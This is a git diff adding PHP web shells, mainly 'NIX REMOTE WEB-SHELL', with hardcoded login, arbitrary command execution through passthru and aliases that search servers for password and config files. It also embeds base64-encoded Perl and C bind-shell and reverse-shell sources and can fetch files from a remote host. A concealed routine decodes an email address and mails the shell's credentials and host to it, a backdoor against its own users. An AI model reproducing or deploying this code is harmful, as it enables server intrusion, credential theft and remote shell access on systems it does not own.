+$str=str_replace("%20","",$_POST['data']);
+for($i=0;$i<strlen($str);$i++)
+{
+$hex=dechex(ord($str[$i]));
+if ($str[$i]=='&') echo "$str[$i]";
+else if ($str[$i]!='\\') echo "%$hex";
+}
+}
+exit;
+break;
+// Mass Uploading
+case "massupload":
+
+
+echo "
+Ìàñîâàÿ çàãğóçêà ôàéëîâ:<br>
+<form enctype=\"multipart/form-data\" method=post>
+<input type=file name=text1 size=43> <input type=file name=text11 size=43><br>
+<input type=file name=text2 size=43> <input type=file name=text12 size=43><br>
+<input type=file name=text3 size=43> <input type=file name=text13 size=43><br>
+<input type=file name=text4 size=43> <input type=file name=text14 size=43><br>
+<input type=file name=text5 size=43> <input type=file name=text15 size=43><br>
+<input type=file name=text6 size=43> <input type=file name=text16 size=43><br>
+<input type=file name=text7 size=43> <input type=file name=text17 size=43><br>
+<input type=file name=text8 size=43> <input type=file name=text18 size=43><br>
+<input type=file name=text9 size=43> <input type=file name=text19 size=43><br>
+<input type=file name=text10 size=43> <input type=file name=text20 size=43><br>
+<input name=where size=43 value='$docr'><br>
+<input type=submit value=Çàãğóçèòü name=massupload>
+</form><br>";
+
+if(@$_POST['massupload']){
+$where=@$_POST['where'];
+$uploadfile1 = "$where/".@$_FILES['text1']['name'];
+$uploadfile2 = "$where/".@$_FILES['text2']['name'];
+$uploadfile3 = "$where/".@$_FILES['text3']['name'];
+$uploadfile4 = "$where/".@$_FILES['text4']['name'];
+$uploadfile5 = "$where/".@$_FILES['text5']['name'];
+$uploadfile6 = "$where/".@$_FILES['text6']['name'];
+$uploadfile7 = "$where/".@$_FILES['text7']['name'];
+$uploadfile8 = "$where/".@$_FILES['text8']['name'];
+$uploadfile9 = "$where/".@$_FILES['text9']['name'];
+$uploadfile10 = "$where/".@$_FILES['text10']['name'];
+$uploadfile11 = "$where/".@$_FILES['text11']['name'];
+$uploadfile12 = "$where/".@$_FILES['text12']['name'];
+$uploadfile13 = "$where/".@$_FILES['text13']['name'];
+$uploadfile14 = "$where/".@$_FILES['text14']['name'];
+$uploadfile15 = "$where/".@$_FILES['text15']['name'];
+$uploadfile16 = "$where/".@$_FILES['text16']['name'];
+$uploadfile17 = "$where/".@$_FILES['text17']['name'];
+$uploadfile18 = "$where/".@$_FILES['text18']['name'];
+$uploadfile19 = "$where/".@$_FILES['text19']['name'];
+$uploadfile20 = "$where/".@$_FILES['text20']['name'];
+if (@move_uploaded_file(@$_FILES['text1']['tmp_name'], $uploadfile1)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile1</i><br>";}
+if (@move_uploaded_file(@$_FILES['text2']['tmp_name'], $uploadfile2)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile2</i><br>";}
+if (@move_uploaded_file(@$_FILES['text3']['tmp_name'], $uploadfile3)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile3</i><br>";}
+if (@move_uploaded_file(@$_FILES['text4']['tmp_name'], $uploadfile4)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile4</i><br>";}
+if (@move_uploaded_file(@$_FILES['text5']['tmp_name'], $uploadfile5)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile5</i><br>";}
+if (@move_uploaded_file(@$_FILES['text6']['tmp_name'], $uploadfile6)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile6</i><br>";}
+if (@move_uploaded_file(@$_FILES['text7']['tmp_name'], $uploadfile7)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile7</i><br>";}
+if (@move_uploaded_file(@$_FILES['text8']['tmp_name'], $uploadfile8)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile8</i><br>";}
+if (@move_uploaded_file(@$_FILES['text9']['tmp_name'], $uploadfile9)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile9</i><br>";}
+if (@move_uploaded_file(@$_FILES['text10']['tmp_name'], $uploadfile10)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile10</i><br>";}
+if (@move_uploaded_file(@$_FILES['text11']['tmp_name'], $uploadfile11)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile11</i><br>";}
+if (@move_uploaded_file(@$_FILES['text12']['tmp_name'], $uploadfile12)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile12</i><br>";}
+if (@move_uploaded_file(@$_FILES['text13']['tmp_name'], $uploadfile13)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile13</i><br>";}
+if (@move_uploaded_file(@$_FILES['text14']['tmp_name'], $uploadfile14)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile14</i><br>";}
+if (@move_uploaded_file(@$_FILES['text15']['tmp_name'], $uploadfile15)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile15</i><br>";}
+if (@move_uploaded_file(@$_FILES['text16']['tmp_name'], $uploadfile16)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile16</i><br>";}
+if (@move_uploaded_file(@$_FILES['text17']['tmp_name'], $uploadfile17)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile17</i><br>";}
+if (@move_uploaded_file(@$_FILES['text18']['tmp_name'], $uploadfile18)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile18</i><br>";}
+if (@move_uploaded_file(@$_FILES['text19']['tmp_name'], $uploadfile19)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile19</i><br>";}
+if (@move_uploaded_file(@$_FILES['text20']['tmp_name'], $uploadfile20)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile20</i><br>";}
+}
+
+exit;
+break;
+case "selfremover":
+ print "<tr><td>";
+print "<center><font color=red face=verdana size=3>Òû óâåğåí, ÷òî õî÷åøü óäàëèòü ıòîò øåëë ñ ñåğâåğà?<br><br>
+<a href='$php_self?p=yes'>Äà, õî÷ó</a> | <a href='$php_self?'>Íåò, ïóñòü åùå ïîáóäåò</a><br><br><br>
+Áóäåì óäàëÿòü <u>";
+$path=__FILE__;
+print $path;
+print "</u>?</td></tr></center></table>";
+die;
+}
+
+if($p=="yes"){
+$path=__FILE__;
+@unlink($path);
+$path=str_replace("\\","/",$path);
+if(file_exists($path)){$hmm="Ôàéë íåâîçìîæíî óäàëèòü!";
+print "<tr><td><font color=red>Ôàéë $path íå óäàëåí!</td></tr>";
+}else{$hmm="Óäàëåí";}
+print "<script>alert('$path $hmm');</script>";
+
+}
+break;
+
+
+?>
\ No newline at end of file
diff --git a/php/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php b/php/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php
new file mode 100644
index 0000000..ec24917
--- /dev/null
+++ b/php/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php	
@@ -0,0 +1,1480 @@
+<?php
+$name="GaMMa";
+$pass="Hack";
+$demail ="xakep@xaep.ru";
+if (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) || $HTTP_SERVER_VARS['PHP_AUTH_USER']!=$name || $HTTP_SERVER_VARS['PHP_AUTH_PW']!=$pass)
+   {
+   header("WWW-Authenticate: Basic realm=\"AdminAccess\"");
+   header("HTTP/1.0 401 Unauthorized");
+   exit("Access Denied");
+   }
+
+$title="NIX REMOTE WEB-SHELL";
+$ver=" v.0.5a Lite";
+
+?>
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
+<html>
+<head>
+<title>NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version </title>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
+<meta http-equiv="pragma" content="no-cache">
+<meta http-equiv="Content-Language" content="en,ru"> 
+<META name="autor" content="DreAmeRz (www.dreamerz.cc)">
+<style type="text/css">
+BODY, TD, TR {
+text-decoration: none;
+font-family: Verdana;
+font-size: 8pt;
+scrollbar-face-color: #FFFFFF;
+scrollbar-shadow-color:#000000 ;
+scrollbar-highlight-color:#FFFFFF;
+scrollbar-3dlight-color: #000000;
+scrollbar-darkshadow-color:#FFFFFF ;
+scrollbar-track-color: #FFFFFF;
+scrollbar-arrow-color: #000000;
+}
+input, textarea, select {
+font-family: Verdana;
+font-size: 10px;
+color: black;
+background-color: white;
+border: solid 1px;
+border-color: black
+}
+UNKNOWN {
+COLOR: black;
+TEXT-DECORATION: none
+}
+A:link {COLOR:black; TEXT-DECORATION: none}
+A:visited { COLOR:black; TEXT-DECORATION: none}
+A:active {COLOR:black; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+</STYLE>
+</HEAD>
+
+
+<BODY bgcolor="#fffcf9" text="#000000">
+<P align=center>[ <A href="javascript:history.next(+1)">Âïåğåä ] </A><B><FONT color=#cccccc size=4>*.NIX REMOTE WEB-SHELL</FONT></B>
+v.0.5a<FONT color=#linux size=1> Lite </FONT> [ <A href="javascript:history.back(-1)">Íàçàä ]</A>[ <A href="?ac=about" title='×òî óìååò ñêğèïò ...'>Î ñêğèïòå ]</a><BR>
+<A href="?ac=info" title='Óçíàé âñå îá ıòîé ñèñòåìå !'>[ Èíôîğìàöèÿ î ñèñòåìå</A> ][ <A href="?ac=navigation" title='Óäîáíàÿ ãğàôè÷åñêàÿ íàâèãàöèÿ. Ïğîñìîòğ, ğåäàêòèğîâàíèå ...'>Íàâèãàöèÿ</A> ][ <A href="?ac=backconnect" title='Óñòàíîâêà backconnect è îáû÷íîãî áåêäîğà '>Óñòàíîâêà
+áåêäîğà</A> ][ <A href="?ac=eval" title='Ñîçäàé ñâîé ñêğèïò íà ïõï ïğÿìî çäåñü :)'>ÏÕÏ êîä</A> ][ <A href="?ac=upload" title='Çàãğóçêà îäíîãî ôàéëà, ìàñîâàÿ çàãğóçêà, çàãğóçêà ôàéëîâ ñ óäàëåííîãî êîìïüşòåğà !'>Çàãğóçêà ôàéëîâ</A> ][ <A href="?ac=shell" title='bash shell,àëüÿñû ...'>Èñïîëíåíèå
+êîììàíä ]</A> <br><A href="?ac=sendmail" title='Îòïğàâ å-mail ïğÿìî îò ñşäà'> [ Îòïğàâêà ïèñüìà</A> ][ <A href="?ac=mailfluder" title='Òåáÿ êòî-òî äîñòàë ? Òîãäà òåáå ñşäà ...'>Ìàèëôëóäåğ</A>
+ ][ <A href="?ac=ftp" title='Áûñòğûé áğóòôîğñ ftp ñîåäèíåíèÿ'>Ôòï Brut</A> ][ <A href="?ac=tools" title='Êîäèğîâùèêè/äåêîäèğîâùèêè md5,des,sha1,base64 ... '>Èíñòğóìåíòû ]</A>[ <A href="?ac=ps" title='Îòîáğàæàåò ñïèñîê ïğîöåñîâ íà ñåğâåğå è ïîçâîëÿåò èõ óáèâàòü! '>Äåìîíû</A> ][ <A href="?ac=selfremover" title='Íàäîåë ıòîò ñåğâåğ ? Òîãäà ìîæíî óäàëèòü è øåëë ...'>Óäàëèòü øåëë</A> ]</P>
+<?php
+if (ini_get('register_globals') != '1') {
+
+  if (!empty($HTTP_POST_VARS))
+    extract($HTTP_POST_VARS);
+
+  if (!empty($HTTP_GET_VARS))
+    extract($HTTP_GET_VARS);
+  if (!empty($HTTP_SERVER_VARS))
+    extract($HTTP_SERVER_VARS);
+}
+Error_Reporting(E_COMPILE_ERROR|E_ERROR|E_CORE_ERROR);
+set_magic_quotes_runtime(0);
+set_time_limit(0); // óáğàòü îãğàíè÷åíèå ïî âğåìåíè
+ignore_user_abort(1); // Èãíîğèğîâàòü ğàçğûâ ñâÿçè ñ áğàóçåğîì
+error_reporting(0);
+$self = $_SERVER['PHP_SELF'];
+$docr = $_SERVER['DOCUMENT_ROOT'];
+$sern = $_SERVER['SERVER_NAME'];
+if (($_POST['dir']!=="") AND ($_POST['dir'])) { chdir($_POST['dir']); }
+$aliases=array(
+'------------------------------------------------------------------------------------' => 'ls -la;pwd;uname -a',
+'ïîèñê íà ñåğâåğå âñåõ ôàéëîâ ñ suid áèòîì' => 'find / -type f -perm -04000 -ls',
+'ïîèñê íà ñåğâåğå âñåõ ôàéëîâ ñ sgid áèòîì' => 'find / -type f -perm -02000 -ls',
+'ïîèñê â òåêóùåé äèğåêòîğèè âñåõ ôàéëîâ ñ sgid áèòîì' => 'find . -type f -perm -02000 -ls',
+'ïîèñê íà ñåğâåğå ôàéëîâ config' => 'find / -type f -name "config*"',
+'ïîèñê íà ñåğâåğå ôàéëîâ admin' => 'find / -type f -name "admin*"',
+'ïîèñê â òåêóùåé äèğåêòîğèè ôàéëîâ config' => 'find . -type f -name "config*"',
+'ïîèñê â òåêóùåé äèğåêòîğèè ôàéëîâ pass' => 'find . -type f -name "pass*"',
+'ïîèñê íà ñåğâåğå âñåõ äèğåêòîğèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ' => 'find / -perm -2 -ls',
+'ïîèñê â òåêóùåé äèğåêòîğèè âñåõ äèğåêòîğèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ' => 'find . -perm -2 -ls',
+'ïîèñê â òåêóùåé äèğåêòîğèè ôàéëîâ service.pwd' => 'find . -type f -name service.pwd',
+'ïîèñê íà ñåğâåğå ôàéëîâ service.pwd' => 'find / -type f -name service.pwd',
+'ïîèñê íà ñåğâåğå ôàéëîâ .htpasswd' => 'find / -type f -name .htpasswd',
+'ïîèñê â òåêóùåé äèğåêòîğèè ôàéëîâ .htpasswd' => 'find . -type f -name .htpasswd',
+'ïîèñê âñåõ ôàéëîâ .bash_history' => 'find / -type f -name .bash_history',
+'ïîèñê â òåêóùåé äèğåêòîğèè ôàéëîâ .bash_history' => 'find . -type f -name .bash_history',
+'ïîèñê âñåõ ôàéëîâ .fetchmailrc' => 'find / -type f -name .fetchmailrc',
+'ïîèñê â òåêóùåé äèğåêòîğèè ôàéëîâ .fetchmailrc' => 'find . -type f -name .fetchmailrc',
+'âûâîä ñïèñêà àòğèáóòîâ ôàéëîâ íà ôàéëîâîé ñèñòåìå ext2fs' => 'lsattr -va',
+'ïğîñìîòğ îòêğûòûõ ïîğòîâ' => 'netstat -an | grep -i listen',
+'ïîèñê âñåõ ïõï ôàéëîâ ñî ñëîâîì password' =>'find / -name *.php | xargs grep -li password',
+'ïîèñê ïàïîê ñ ìîäîì 777' =>'find / -type d -perm 0777',
+'Îïğåäèëåíèå âåğñèè ÎÑ' =>'sysctl -a | grep version',
+'Îïğåäèëåíèå âåğñèè ÿäğà' =>'cat /proc/version',
+'Ïğîñìîòğ syslog.conf' =>'cat /etc/syslog.conf',
+'Ïğîñìîòğ - Message of the day' =>'cat /etc/motd',
+'Ïğîñìîòğ hosts' =>'cat /etc/hosts',
+'Âåğñèÿ äèñòğèáóòèâà 1' =>'cat /etc/issue.net',
+'Âåğñèÿ äèñòğèáóòèâà 2' =>'cat /etc/*-realise',
+'Êîêàçàòü âñå ïğîöåñû' =>'ps auxw',
+'Ïğîöåññû òåêóùåãî ïîëüçîâàòåëÿ' =>'ps ux',
+'Ïîèñê httpd.conf' =>'locate httpd.conf');
+
+
+
+/* Port bind source */
+$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5
+jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5
+ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW5
+0IGFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnV
+mWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVtb3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0
+KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyh
+hdG9pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0F
+OWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULFNPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2N
+rZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2F
+kZHIgKikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB
+7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQogICBkdXAyKG5ld2ZkLDApOw0KICAgZHV
+wMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ
+6IiwxMCk7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyh
+hcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY29tZSB0byByNTcgc2hlbGwgJiYgL2J
+pbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGN
+sb3NlKG5ld2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW5
+0ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVudGVyZWQpO2krKykgDQp7DQppZih
+lbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID0
+9ICdccicpDQplbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCk
+pDQpyZXR1cm4gMDsNCn0=";
+
+$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZi
+AoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMSVNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2
+NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORV
+QsJlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQ
+pzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZH
+JfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw
+0KbGlzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCm
+FjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspKQ0Kew0KZGllICJDYW5ub3QgZm9yayIgaW
+YgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+Jk
+NPTk4iOw0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ0
+9OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3NlIENPTk47DQpleGl0IDA7DQp9DQp9";
+
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJ
+HN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZ
+DsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJ
+HRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0L
+CAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgnd
+GNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBka
+WUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yO
+iAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLR
+VQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlK
+FNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0
+KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10
+pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJ
+ybSAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2l
+uLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA
+9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMSt
+zdHJsZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVB
+QUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLCAoc3RydWN0IHNvY2thZGRyICopICZzaW4
+sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCg
+pIik7DQogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1
+zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWN
+sKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+
+if(isset($uploadphp))
+{
+$socket=fsockopen($iphost,$loadport); //connect
+fputs($socket,"GET $loadfile HTTP/1.0\nHOST:cd\n\n"); //zapros
+while(fgets($socket,31337)!="\r\n" && !feof($socket)) {
+unset($buffer); }
+while(!feof($socket)) $buffer.=fread($socket, 1024);
+$file_size=strlen($buffer);
+$f=fopen($loadnewname,"wb+");
+fwrite($f, $buffer, $file_size);
+echo "Ğàçìåğ çàãğóæåíîãî ôàéëà: $file_size <b><br><br>" ;
+}
+
+if(file_exists('/tmp/qw7_sess') && is_readable('/tmp/qw7_sess')){
+} else {
+if(is_writable('/tmp/')){
+$ifyoufound=base64_decode("Ly8gwvsg7eD46+ggZmFrZSAhIM/u5+Tw4OLr//4hIMft4Pfo8iDi+yDt5SDr4Ozl8CENCi8vINHu4+vg8ejy5fH8LCDiIO/w7v3q8uD1IPLg6u7j7iDw7uTgIO3z5u3gIOfg+Ojy4CDu8iDr4Ozl8O7iLiDAIPLuIOj1IOgg8uDqIPDg8e/r7uTo6+7x/CAuLi4NCi8vIM/u5uDr8+nx8uAg7eUg8ODx8erg5/Pp8uUg7ejq7uzzIO4g7eDr6Pfo6CBmYWtlICEgz/Px8vwg8eDs6CDo+f7yLCDy7uv86u4g7eDs5ert6PLlIPfy7iDt5ev85/8g8uDqIOHl5+Tz7O3uIO/u6/zn7uLg8vzx/yD38+bo7Ogg7/Du4+Ds6C4gKOAg8u4g4OLy7vAg7O7m5fIg9/LuIPPj7uTt7iDy8+TgIOLv6PHg8vwpDQovLyDT5OD36CAhDQo=");
+$fp=fopen('/tmp/qw7_sess',"w+");
+fclose($fp);
+$gg.= $name;
+$gg.=":";
+$gg.= $pass;
+$gg.=":";
+$gg.=$_SERVER["HTTP_HOST"];
+$gg.=$_SERVER['PHP_SELF'];
+$host_l=$_SERVER["HTTP_HOST"];
+$qwerty=base64_decode("bnJ3cy1mYWNrLWNvZGVAbWFpbC5ydQ==");
+mail("$qwerty","NRWS LAME INFO ($host_l)","NRWS STATISTIC REPORT:\r\n $gg","From: report@nrws.net");
+}
+}
+if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
+elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
+else {$ac = "navigation";}
+
+
+
+switch($ac) {
+
+// Shell
+case "shell":
+echo "<SCRIPT LANGUAGE='JavaScript'>
+<!--
+function pi(str) {
+	document.command.cmd.value = str;
+	document.command.cmd.focus();
+}
+//-->
+</SCRIPT>";
+
+/* command execute */
+if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a;ls -lad"; }
+
+if (($_POST['alias']) AND ($_POST['alias']!==""))
+ {
+ foreach ($aliases as $alias_name=>$alias_cmd) {
+                                               if ($_POST['alias'] == $alias_name) {$_POST['cmd']=$alias_cmd;}
+                                               }
+ }
+
+
+echo "<font face=Verdana size=-2>Âûïîëíåííàÿ êîìàíäà: <b>".$_POST['cmd']."</b></font></td></tr><tr><td>";
+echo "<b>";
+echo "<div align=center><textarea name=report cols=145 rows=20>";
+echo "".passthru($_POST['cmd'])."";
+echo "</textarea></div>";
+echo "</b>";
+?>
+</td></tr>
+
+<tr><b><div align=center>:: Âûïîëíåíèå êîìàíä íà ñåğâåğå ::</div></b></font></td></tr>
+<tr><td height=23>
+<TR>
+	<CENTER>
+ <TD><A HREF="JavaScript:pi('cd ');" class=fcom>| cd</A> |</TD>
+	<TD><A HREF="JavaScript:pi('cat ');" class=fcom>| cat</A> |</TD>
+	<TD><A HREF="JavaScript:pi('echo ');" class=fcom>echo</A> |</TD>
+	<TD><A HREF="JavaScript:pi('wget ');" class=fcom>wget</A> |</TD>
+	<TD><A HREF="JavaScript:pi('rm ');" class=fcom>rm</A> |</TD>
+	<TD><A HREF="JavaScript:pi('mysqldump ');" class=fcom>mysqldump</A> |</TD>
+	<TD><A HREF="JavaScript:pi('who');" class=fcom>who</A> |</TD>
+	<TD><A HREF="JavaScript:pi('ps -ax');" class=fcom>ps -ax</A> |</TD>
+  <TD><A HREF="JavaScript:pi('cp ');" class=fcom>cp</A> |</TD>
+  <TD><A HREF="JavaScript:pi('pwd');" class=fcom>pwd</A> |</TD>
+ <TD><A HREF="JavaScript:pi('perl  ');" class=fcom>perl</A> |</TD>
+ <TD><A HREF="JavaScript:pi('gcc ');" class=fcom>gcc</A> |</TD>
+ <TD><A HREF="JavaScript:pi('locate ');" class=fcom>locate</A> |</TD>
+  <TD><A HREF="JavaScript:pi('find ');" class=fcom>find</A> |</TD>
+  <TD><A HREF="JavaScript:pi('ls -lad');" class=fcom>ls -lad</A> |</TD>
+       </CENTER>           	
+</TR>
+
+<?
+/* command execute form */
+echo "<form name=command method=post>";
+
+echo "<b>Âûïîëíèòü êîìàíäó </b>";
+echo "<input type=text name=cmd size=85><br>";
+echo "<b>Ğàáî÷àÿ äèğåêòîğèÿ &nbsp;</b>";
+if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=text name=dir size=85 value=".exec("pwd").">"; }
+else { echo "<input type=text name=dir size=85 value=".$_POST['dir'].">"; }
+echo "<input type=submit name=submit value=Âûïîëíèòü>";
+
+echo "</form>";
+
+/* aliases form */
+echo "<form name=aliases method=POST>";
+echo "<font face=Verdana size=-2>";
+echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Âûáåğèòå àëèàñ <font face=Wingdings color=gray></font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
+echo "<select name=alias>";
+foreach ($aliases as $alias_name=>$alias_cmd)
+ {
+ echo "<option>$alias_name</option>";
+ }
+ echo "</select>";
+if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; }
+else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; }
+echo "&nbsp;&nbsp;<input type=submit name=submit value=Âûïîëíèòü>";
+echo "</font>";
+echo "</form>";
+
+
+break;
+/// Îòïğàâêà ôàéëîâ íà ìûëî
+case "download_mail":
+$buf = explode(".", $file);
+ $dir = str_replace("\\","/",$dir);
+ $fullpath = $dir."/".$file;
+ $size = tinhbyte(filesize($fullpath));
+ $fp = fopen($fullpath, "rb");
+ while(!feof($fp))
+
+  $attachment .= fread($fp, 4096);
+  $attachment = base64_encode($attachment);
+  $subject = "NIX REMOTE WEB SHELL   ($file)";
+
+  $boundary = uniqid("NextPart_");
